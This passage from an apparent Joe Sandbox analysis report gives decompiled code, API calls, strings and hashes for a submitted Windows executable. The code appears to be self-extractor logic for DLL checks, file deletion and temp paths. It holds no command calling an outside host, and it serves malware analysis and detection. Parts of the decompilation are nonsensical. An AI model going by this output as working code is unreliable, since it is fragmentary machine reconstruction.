				_a192 = L"samcli.dll";
				_a196 = L"samlib.dll";
				_a200 = L"wkscli.dll";
				_a204 = L"dfscli.dll";
				_a208 = L"browcli.dll";
				_a212 = L"rasadhlp.dll";
				_a216 = L"dhcpcsvc6.dll";
				_a220 = L"dhcpcsvc.dll";
				_a224 = L"XmlLite.dll";
				_a228 = L"linkinfo.dll";
				_a232 = L"cryptsp.dll";
				_a236 = L"RpcRtRemote.dll";
				_a240 = L"aclui.dll";
				_a244 = L"dsrole.dll";
				_a248 = L"peerdist.dll";
				if( *_t111 == 0x78) {
					L15:
					GetModuleFileNameW(_t174,  &_a772, _t194);
					E00B70602( &_a9160, E00B6C29A(_t215,  &_a772), _t194);
					_t189 = _t174;
					do {
						_t195 = _t174;
						if(E00B6B146() < 0x600) {
							L19:
							_t196 =  *(_t202 + 0x18 + _t195 * 4);
							_push(0x800);
							E00B6C310(_t218,  &_a772, _t196);
							_t122 = GetFileAttributesW( &_a760); // executed
							if(_t122 != _t201) {
								_t189 = _t196;
								L23:
								if(_v1 != 0) {
									L29:
									_t225 = _t189;
									if(_t189 == 0) {
										return _t122;
									}
									E00B6C2E4(_t225,  &_a768);
									if(E00B6B146() < 0x600) {
										_push( &_a9160);
										_push( &_a768);
										E00B64092( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t189);
										_t202 = _t202 + 0x18;
										_t122 = AllocConsole();
										__eflags = _t122;
										if(_t122 != 0) {
											__imp__AttachConsole(GetCurrentProcessId());
											_t133 = E00B83E13( &_a4860);
											WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t133,  &_v4, 0);
											Sleep(0x2710);
											_t122 = FreeConsole();
										}
									} else {
										E00B7081B(L"dwmapi.dll");
										E00B7081B(L"uxtheme.dll");
										_push( &_a9152);
										_push( &_a760);
										E00B64092( &_a4852, 0x864, E00B6E617(0xf1), _t189);
										_t202 = _t202 + 0x18;
										_t122 = E00B7A7E4(0,  &_a4848, E00B6E617(0xf0), 0x30);
									}
									ExitProcess(0);
								}
								_t197 = 0;
								while(1) {
									_t175 =  *(_t202 + 0x38 + _t197 * 4);
									_push(0x800);
									E00B6C310(0,  &_a768, _t175);
									_t122 = GetFileAttributesW( &_a756);
									if(_t122 != _t201) {
										break;
									}
									_t197 = _t197 + 1;
									if(_t197 < 0x35) {
										continue;
									}
									goto L29;
								}
								_t189 = _t175;
								goto L29;
							}
							goto L20;
						}
						_t149 = E00B7081B( *(_t202 + 0x18 + _t195 * 4)); // executed
						if(_t149 == 0) {
							goto L19;
						}
						_t122 = CompareStringW(0x400, 0x1001,  *(_t202 + 0x24 + _t195 * 4), _t201, L"DXGIDebug.dll", _t201); // executed
						_t218 = _t122 - 2;
						if(_t122 != 2) {
							goto L20;
						}
						goto L19;
						L20:
						_t174 =  &(_t174->Internal);
					} while (_t174 < 8);
					goto L23;
				} else {
					_t190 = E00B875FB(_t177, _t111);
					if(_t190 == 0) {
						goto L15;
					}
					GetModuleFileNameW(_t174,  &_a4868, 0x800);
					_t198 = CreateFileW( &_a4868, 0x80000000, 1, _t174, 3, _t174, _t174);
					if(_t198 == _t201 || SetFilePointer(_t198, _t190, _t174, _t174) != _t190 || ReadFile(_t198,  &_a13260, 0x7ffe,  &_a4, _t174) == 0) {
						L14:
						CloseHandle(_t198);
						_t194 = 0x800;
						goto L15;
					} else {
						_push(0x104);
						 *((short*)(_t202 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
						_push( &_a252);
						_push( &_a13260);
						while(1) {
							_t191 = E00B70371();
							_t215 = _t191;
							if(_t191 == 0) {
								goto L14;
							}
							E00B7081B( &_a252);
							_push(0x104);
							_push( &_a248);
							_push(_t191);
						}
						goto L14;
					}
				}
			}

0x00b70868
0x00b70871
0x00b70878
0x00b70882
0x00b70886
0x00b7088e
0x00b70894
0x00b7089b
0x00b7089f
0x00b708a6
0x00b708af
0x00b708b1
0x00b708b7
0x00b708b7
0x00b708c5
0x00b708c9
0x00b708d6
0x00b708d8
0x00b708de
0x00b708e0
0x00b708e0
0x00b708e5
0x00b708e5
0x00b708e7
0x00b708ec
0x00b708ef
0x00b708f7
0x00b708fc
0x00b70904
0x00b7090f
0x00b70917
0x00b7091f
0x00b70927
0x00b7092f
0x00b70937
0x00b7093f
0x00b70947
0x00b7094f
0x00b70957
0x00b7095f
0x00b70967
0x00b7096f
0x00b70977
0x00b7097f
0x00b70987
0x00b7098f
0x00b70997
0x00b7099f
0x00b709a7
0x00b709af
0x00b709b7
0x00b709bf
0x00b709c7
0x00b709d2
0x00b709dd
0x00b709e8
0x00b709f3
0x00b709fe
0x00b70a09
0x00b70a14
0x00b70a1f
0x00b70a2a
0x00b70a35
0x00b70a40
0x00b70a4b
0x00b70a56
0x00b70a61
0x00b70a6c
0x00b70a77
0x00b70a82
0x00b70a8d
0x00b70a98
0x00b70aa3
0x00b70aae
0x00b70ab9
0x00b70ac4
0x00b70acf
0x00b70ada
0x00b70ae5
0x00b70af0
0x00b70afb
0x00b70b06
0x00b70b11
0x00b70b1c
0x00b70b27
0x00b70b32
0x00b70b3d
0x00b70b48
0x00b70c14
0x00b70c1e
0x00b70c3b
0x00b70c40
0x00b70c42
0x00b70c42
0x00b70c4e
0x00b70c7d
0x00b70c7d
0x00b70c88
0x00b70c8f
0x00b70c9c
0x00b70ca4
0x00b70cae
0x00b70cb0
0x00b70cb5
0x00b70cec
0x00b70cec
0x00b70cee
0x00b70e05
0x00b70e05
0x00b70cfc
0x00b70d0b
0x00b70d7a
0x00b70d82
0x00b70d96
0x00b70d9b
0x00b70d9e
0x00b70da4
0x00b70da6
0x00b70daf
0x00b70dc4
0x00b70ddc
0x00b70de7
0x00b70ded
0x00b70ded
0x00b70d0d
0x00b70d12
0x00b70d1c
0x00b70d28
0x00b70d30
0x00b70d4a
0x00b70d4f
0x00b70d69
0x00b70d69
0x00b70df5
0x00b70df5
0x00b70cb7
0x00b70cb9
0x00b70cb9
0x00b70cc4
0x00b70ccb
0x00b70cd8
0x00b70ce0
0x00000000
0x00000000
0x00b70ce2
0x00b70ce6
0x00000000
0x00000000
0x00000000
0x00b70ce8
0x00b70cea
0x00000000
0x00b70cea
0x00000000
0x00b70ca4
0x00b70c54
0x00b70c5b
0x00000000
0x00000000
0x00b70c72
0x00b70c78
0x00b70c7b
0x00000000
0x00000000
0x00000000
0x00b70ca6
0x00b70ca6
0x00b70ca7
0x00000000
0x00b70b4e
0x00b70b54
0x00b70b59
0x00000000
0x00000000
0x00b70b69
0x00b70b89
0x00b70b8d
0x00b70c08
0x00b70c09
0x00b70c0f
0x00000000
0x00b70bbb
0x00b70bc3
0x00b70bc8
0x00b70bd7
0x00b70bdf
0x00b70bfd
0x00b70c02
0x00b70c04
0x00b70c06
0x00000000
0x00000000
0x00b70bea
0x00b70bef
0x00b70bfb
0x00b70bfc
0x00b70bfc
0x00000000
0x00b70bfd
0x00b70b8d

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00B7087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B7088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B708BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B70B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B70B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B70B93
ReadFile.KERNEL32(00000000,?,00007FFE,00B93C7C,00000000), ref: 00B70BB1
CloseHandle.KERNEL32(00000000), ref: 00B70C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B70C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00B93C7C,?,00000000,?,00000800), ref: 00B70C72
GetFileAttributesW.KERNELBASE(?,?,00B93C7C,00000800,?,00000000,?,00000800), ref: 00B70C9C
GetFileAttributesW.KERNEL32(?,?,00B93D44,00000800), ref: 00B70CD8

Part of subcall function 00B7081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B70836
Part of subcall function 00B7081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B6F2D8,Crypt32.dll,00000000,00B6F35C,?,?,00B6F33E,?,?,?), ref: 00B70858

_swprintf.LIBCMT ref: 00B70D4A
_swprintf.LIBCMT ref: 00B70D96

Part of subcall function 00B64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B640A5

AllocConsole.KERNEL32 ref: 00B70D9E
GetCurrentProcessId.KERNEL32 ref: 00B70DA8
AttachConsole.KERNEL32(00000000), ref: 00B70DAF
_wcslen.LIBCMT ref: 00B70DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B70DD5
WriteConsoleW.KERNEL32(00000000), ref: 00B70DDC
Sleep.KERNEL32(00002710), ref: 00B70DE7
FreeConsole.KERNEL32 ref: 00B70DED
ExitProcess.KERNEL32 ref: 00B70DF5

Strings

SetDefaultDllDirectories, xrefs: 00B708B9
uxtheme.dll, xrefs: 00B70D17
SetDllDirectoryW, xrefs: 00B70888
DXGIDebug.dll, xrefs: 00B708FC, 00B70C5E
dwmapi.dll, xrefs: 00B70927, 00B70D0D
kernel32, xrefs: 00B70873
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00B70D84

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: fdffcd65338a70163533ce06c872a52e6913921fc43ea2b5ed955b509724eaa9
Instruction ID: c959e2b8d9be4fa93b34651649ab8c86552411af3ec7baa2cf43bcd708c11e12
Opcode Fuzzy Hash: fdffcd65338a70163533ce06c872a52e6913921fc43ea2b5ed955b509724eaa9
Instruction Fuzzy Hash: 41D166B2018344ABDB319F60C949F9FBAE8FF85B04F5049AEF19997150CB748649CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B7C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00B7C73F(void* __edx, void* __edi) {
				intOrPtr _t232;
				void* _t237;
				intOrPtr _t293;
				intOrPtr _t297;
				long _t308;
				void* _t311;
				signed int _t312;
				void* _t316;

				E00B7EB78(0xb92b20, _t316);
				_t232 = E00B7EC50(0x1b888);
				if( *((intOrPtr*)(_t316 + 0xc)) == 0) {
					L180:
					 *[fs:0x0] =  *((intOrPtr*)(_t316 - 0xc));
					return _t232;
				}
				_push(0x1000);
				_push(_t316 - 0x15);
				_push(_t316 - 0xd);
				_push(_t316 - 0x588c);
				_push(_t316 - 0xf894);
				_push( *((intOrPtr*)(_t316 + 0xc)));
				_t232 = E00B7B314(__edi, _t316);
				_t297 = _t232;
				 *((intOrPtr*)(_t316 + 0xc)) = _t297;
				if(_t297 != 0) {
					_t293 =  *((intOrPtr*)(_t316 + 0x10));
					_push(__edi);
					do {
						_t237 = _t316 - 0x588c;
						_t311 = _t316 - 0x1b894;
						_t308 = 6;
						goto L4;
						L6:
						while(E00B71FBB(_t316 - 0xf894,  *((intOrPtr*)(0xb9e744 + _t312 * 4))) != 0) {
							_t312 = _t312 + 1;
							if(_t312 < 0xe) {
								continue;
							} else {
								goto L178;
							}
						}
						if(_t312 > 0xd) {
							goto L178;
						}
						switch( *((intOrPtr*)(_t312 * 4 +  &M00B7D41B))) {
							case 0:
								__eflags = _t293 - 2;
								if(_t293 == 2) {
									_t308 = 0x800;
									E00B7A64D(_t316 - 0x788c, 0x800);
									E00B6A544(E00B6BDF3(__eflags, _t316 - 0x788c, _t316 - 0x588c, _t316 - 0xd894, 0x800), _t293, _t316 - 0x8894, _t312);
									 *(_t316 - 4) = 0;
									E00B6A67E(_t316 - 0x8894, _t316 - 0xd894);
									E00B66EDB(_t316 - 0x388c);
									while(1) {
										_push(0);
										_t255 = E00B6A5D1(_t316 - 0x8894, _t316 - 0x388c);
										__eflags = _t255;
										if(_t255 == 0) {
											break;
										}
										SetFileAttributesW(_t316 - 0x388c, 0);
										__eflags =  *(_t316 - 0x2880);
										if(__eflags == 0) {
											L18:
											_t259 = GetFileAttributesW(_t316 - 0x388c);
											__eflags = _t259 - 0xffffffff;
											if(_t259 == 0xffffffff) {
												continue;
											}
											_t261 = DeleteFileW(_t316 - 0x388c);
											__eflags = _t261;
											if(_t261 != 0) {
												continue;
											} else {
												_t314 = 0;
												_push(0);
												goto L22;
												L22:
												E00B64092(_t316 - 0x1044, _t308, L"%s.%d.tmp", _t316 - 0x388c);
												_t318 = _t318 + 0x14;
												_t266 = GetFileAttributesW(_t316 - 0x1044);
												__eflags = _t266 - 0xffffffff;
												if(_t266 != 0xffffffff) {
													_t314 = _t314 + 1;
													__eflags = _t314;
													_push(_t314);
													goto L22;
												} else {
													_t269 = MoveFileW(_t316 - 0x388c, _t316 - 0x1044);
													__eflags = _t269;
													if(_t269 != 0) {
														MoveFileExW(_t316 - 0x1044, 0, 4);
													}
													continue;
												}
											}
										}
										E00B6B991(__eflags, _t316 - 0x788c, _t316 - 0x1044, _t308);
										E00B6B690(__eflags, _t316 - 0x1044, _t308);
										_t315 = E00B83E13(_t316 - 0x788c);
										__eflags = _t315 - 4;
										if(_t315 < 4) {
											L16:
											_t280 = E00B6BDB4(_t316 - 0x588c);
											__eflags = _t280;
											if(_t280 != 0) {
												break;
											}
											L17:
											_t283 = E00B83E13(_t316 - 0x388c);
											__eflags = 0;
											 *((short*)(_t316 + _t283 * 2 - 0x388a)) = 0;
											E00B7FFF0(_t308, _t316 - 0x44, 0, 0x1e);
											_t318 = _t318 + 0x10;
											 *((intOrPtr*)(_t316 - 0x40)) = 3;
											_push(0x14);
											_pop(_t286);
											 *((short*)(_t316 - 0x34)) = _t286;
											 *((intOrPtr*)(_t316 - 0x3c)) = _t316 - 0x388c;
											_push(_t316 - 0x44);
											 *0xbc307c();
											goto L18;
										}
										_t291 = E00B83E13(_t316 - 0x1044);
										__eflags = _t315 - _t291;
										if(_t315 > _t291) {
											goto L17;
										}
										goto L16;
									}
									 *(_t316 - 4) =  *(_t316 - 4) | 0xffffffff;
									E00B6A55A(_t316 - 0x8894);
								}
								goto L178;
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax = E00B83E13(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0xbbfc94);
									__eax = E00B83E3E(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										__eax = E00B87686(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L00B83E2E(__esi);
									}
								}
								goto L178;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
								}
								goto L178;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L178;
								}
								__eflags =  *0xbaa472 - __di;
								if( *0xbaa472 != __di) {
									goto L178;
								}
								__eax = 0;
								__edi = __ebp - 0x588c;
								_push(0x22);
								 *(__ebp - 0x1044) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x588c) - __ax;
								if( *(__ebp - 0x588c) == __ax) {
									__edi = __ebp - 0x588a;
								}
								__eax = E00B83E13(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L178;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L64:
											__ebp - 0x1044 = E00B70602(__ebp - 0x1044, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L65:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x1044;
											__eax = E00B8279B(__ebp - 0x1044, __ebp - 0x1044);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *(__eax + 2) - __bx;
												if( *(__eax + 2) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x1044;
											__edi = 0xbaa472;
											E00B70602(0xbaa472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
											__eax = E00B7B1BE(__ebp - 0x1044, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
											__eax = SendMessageW(__esi, 0x143, __ebx, 0xbaa472); // executed
											__eax = __ebp - 0x1044;
											__eax = E00B83E49(__ebp - 0x1044, 0xbaa472, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
											}
											goto L178;
										}
										L53:
										__eflags = __ax;
										if(__ax == 0) {
											L55:
											__eax = __ebp - 0x1c;
											__ebx = 0;
											_push(__ebp - 0x1c);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0xbc3028();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x1044;
												_push(__ebp - 0x1044);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x1c));
												__eax =  *0xbc3024();
												_push( *(__ebp - 0x1c));
												 *0xbc3008() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x1044) = __cx;
											}
											__eflags =  *(__ebp - 0x1044) - __bx;
											if( *(__ebp - 0x1044) != __bx) {
												__eax = __ebp - 0x1044;
												__eax = E00B83E13(__ebp - 0x1044);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x1044 = E00B705DA(__eflags, __ebp - 0x1044, "\\", __esi);
												}
											}
											__esi = E00B83E13(__edi);
											__eax = __ebp - 0x1044;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x1044 = E00B705DA(__eflags, __ebp - 0x1044, __edi, 0x800);
											}
											goto L65;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L64;
										}
										goto L55;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L53;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L178;
									} else {
										__ebp - 0x1044 = E00B70602(__ebp - 0x1044, __edi, 0x800);
										goto L65;
									}
								}
							case 4:
								__eflags =  *0xbaa46c - 1;
								__eflags = __eax - 0xbaa46c;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__edx + 7) & __al;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L82:
									 *0xba8457 = __cl;
									 *0xba8460 = 1;
									goto L178;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0xba8457 = __cl;
									L81:
									 *0xba8460 = __cl;
									goto L178;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L82;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L178;
								}
								 *0xba8457 = 1;
								goto L81;
							case 6:
								__edi = 0;
								 *0xbac577 = 1;
								__edi = 1;
								__eax = __ebp - 0x588c;
								__eflags =  *(__ebp - 0x588c) - 0x3c;
								__ebx = __esi;
								 *(__ebp - 0x14) = __eax;
								if( *(__ebp - 0x588c) != 0x3c) {
									L99:
									__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
									if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
										if( *((intOrPtr*)(__ebp + 0x10)) != 4) {
											goto L178;
										}
										__eflags = __ebx - 6;
										if(__ebx != 6) {
											goto L178;
										}
										__ecx = 0;
										__eflags = 0;
										_push(0);
										L105:
										_push(__edi);
										_push(__eax);
										_push( *(__ebp + 8));
										__eax = E00B7D78F(__ebp);
										goto L178;
									}
									__eflags = __ebx - 9;
									if(__ebx != 9) {
										goto L178;
									}
									_push(1);
									goto L105;
								}
								__eax = __ebp - 0x588a;
								_push(0x3e);
								_push(__ebp - 0x588a);
								__eax = E00B822C6(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									L98:
									__eax =  *(__ebp - 0x14);
									goto L99;
								}
								_t111 = __eax + 2; // 0x2
								__ecx = _t111;
								 *(__ebp - 0x14) = _t111;
								__ecx = 0;
								 *__eax = __cx;
								__eax = __ebp - 0x10c;
								_push(0x64);
								_push(__ebp - 0x10c);
								__eax = __ebp - 0x588a;
								_push(__ebp - 0x588a);
								__eax = E00B7AF98();
								 *(__ebp - 0x20) = __eax;
								__eflags = __eax;
								if(__eax == 0) {
									goto L98;
								}
								__esi = __eax;
								while(1) {
									__eflags =  *(__ebp - 0x10c);
									if( *(__ebp - 0x10c) == 0) {
										goto L98;
									}
									__eax = __ebp - 0x10c;
									__eax = E00B71FBB(__ebp - 0x10c, L"HIDE");
									__eax =  ~__eax;
									asm("sbb eax, eax");
									__edi = __edi & __eax;
									__eax = __ebp - 0x10c;
									__eax = E00B71FBB(__ebp - 0x10c, L"MAX");
									__eflags = __eax;
									if(__eax == 0) {
										_push(3);
										_pop(__edi);
									}
									__eax = __ebp - 0x10c;
									__eax = E00B71FBB(__ebp - 0x10c, L"MIN");
									__eflags = __eax;
									if(__eax == 0) {
										_push(6);
										_pop(__edi);
									}
									_push(0x64);
									__eax = __ebp - 0x10c;
									_push(__ebp - 0x10c);
									_push(__esi);
									__esi = E00B7AF98();
									__eflags = __esi;
									if(__esi != 0) {
										continue;
									} else {
										goto L98;
									}
								}
								goto L98;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0xbaa46c - __edi;
										if( *0xbaa46c == __edi) {
											 *0xbaa46c = 2;
										}
										 *0xba9468 = 1;
									}
									goto L178;
								}
								__eax = __ebp - 0x788c;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
								__eax = E00B6B690(__eflags, __ebp - 0x788c, 0x800);
								__ebx = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0xb9e724);
									__ebp - 0x788c = E00B64092(0xba946a, __edi, L"%s%s%u", __ebp - 0x788c);
									__eax = E00B6A231(0xba946a);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xba946a);
								__eflags =  *(__ebp - 0x588c) - __bx;
								if( *(__ebp - 0x588c) == __bx) {
									goto L178;
								}
								__eflags =  *0xbac575 - __bl;
								if( *0xbac575 != __bl) {
									goto L178;
								}
								__eax = 0;
								 *(__ebp - 0x444) = __ax;
								__eax = __ebp - 0x588c;
								_push(0x2c);
								_push(__ebp - 0x588c);
								__eax = E00B822C6(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L122:
									__eflags =  *(__ebp - 0x444) - __bx;
									if( *(__ebp - 0x444) == __bx) {
										__ebp - 0x1b894 = __ebp - 0x588c;
										E00B70602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
										__ebp - 0x444 = E00B70602(__ebp - 0x444, __ebp - 0x19894, 0x200);
									}
									__ebp - 0x588c = E00B7ADD2(__ebp - 0x588c);
									__eax = 0;
									 *(__ebp - 0x488c) = __ax;
									__ebp - 0x444 = __ebp - 0x588c;
									__eax = E00B7A7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
									__eflags = __eax - 6;
									if(__eax != 6) {
										__eax = 0;
										 *0xba8454 = 1;
										 *0xba946a = __ax;
										__eax = EndDialog( *(__ebp + 8), 1);
									}
									goto L178;
								}
								__ax =  *(__ebp - 0x588c);
								__esi = __ebx;
								__eflags = __ax;
								if(__ax == 0) {
									goto L122;
								}
								__ecx = __ax & 0x0000ffff;
								while(1) {
									__eflags = __cx - 0x40;
									if(__cx == 0x40) {
										break;
									}
									__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
									__esi =  &(__esi->i);
									__ecx = __eax;
									__eflags = __ax;
									if(__ax != 0) {
										continue;
									}
									goto L122;
								}
								__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
								__ebp - 0x444 = E00B70602(__ebp - 0x444, __ebp - 0x444, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x588c) = __ax;
								goto L122;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x588c) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x588c;
										_push(__ebp - 0x588c);
										__eax = E00B87625(__ebx, __edi);
										_pop(__ecx);
										 *0xbbfc9c = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0xbbfc98 = E00B7B48E(__ecx, __edx, __eflags);
								}
								 *0xbac576 = 1;
								goto L178;
							case 9:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L178;
								}
								__eax = 0;
								 *(__ebp - 0x2844) = __ax;
								__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
								__eax = E00B879E9( *(__ebp - 0x1b894) & 0x0000ffff);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									 *(__ebp - 0x14) = 2;
									__eax = 0xbbcb82;
								} else {
									__eflags = __eax - 0x54;
									if(__eax == 0x54) {
										 *(__ebp - 0x14) = 7;
										__eax = 0xbbbb82;
									} else {
										 *(__ebp - 0x14) = 0x10;
										__eax = 0xbbdb82;
									}
								}
								__esi = 0x800;
								__ebp - 0x2844 = E00B70602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
								__eax = 0;
								 *(__ebp - 0x9894) = __ax;
								 *(__ebp - 0x1844) = __ax;
								__ebp - 0x19894 = __ebp - 0x688c;
								__eax = E00B70602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x688c) - __bx;
								if( *(__ebp - 0x688c) != __bx) {
									__ebp - 0x688c = E00B6A231(__ebp - 0x688c);
									__eflags = __al;
									if(__al != 0) {
										goto L163;
									}
									__ax =  *(__ebp - 0x688c);
									__esi = __ebp - 0x688c;
									__ebx = __edi;
									__eflags = __ax;
									if(__ax == 0) {
										__esi = 0x800;
										goto L163;
									}
									__edi = __ax & 0x0000ffff;
									do {
										_push(0x20);
										_pop(__eax);
										__eflags = __di - __ax;
										if(__di == __ax) {
											L149:
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x688c = E00B6A231(__ebp - 0x688c);
											__eflags = __al;
											if(__al == 0) {
												L158:
												__esi->i = __di;
												goto L159;
											}
											__ebp - 0x688c = E00B6A243(__ebp - 0x688c);
											__eax = E00B6A28F(__eax);
											__eflags = __al;
											if(__al != 0) {
												goto L158;
											}
											_push(0x2f);
											_pop(__ecx);
											__eax =  &(__esi->i);
											__ebx = __esi;
											__eflags = __di - __cx;
											if(__di != __cx) {
												_push(0x20);
												__esi = __eax;
												_pop(__eax);
												while(1) {
													__eflags = __esi->i - __ax;
													if(__esi->i != __ax) {
														break;
													}
													__esi =  &(__esi->i);
													__eflags = __esi;
												}
												__ecx = __ebp - 0x1844;
												__eax = __esi;
												__edx = 0x400;
												L157:
												__eax = E00B70602(__ecx, __eax, __edx);
												 *__ebx = __di;
												goto L159;
											}
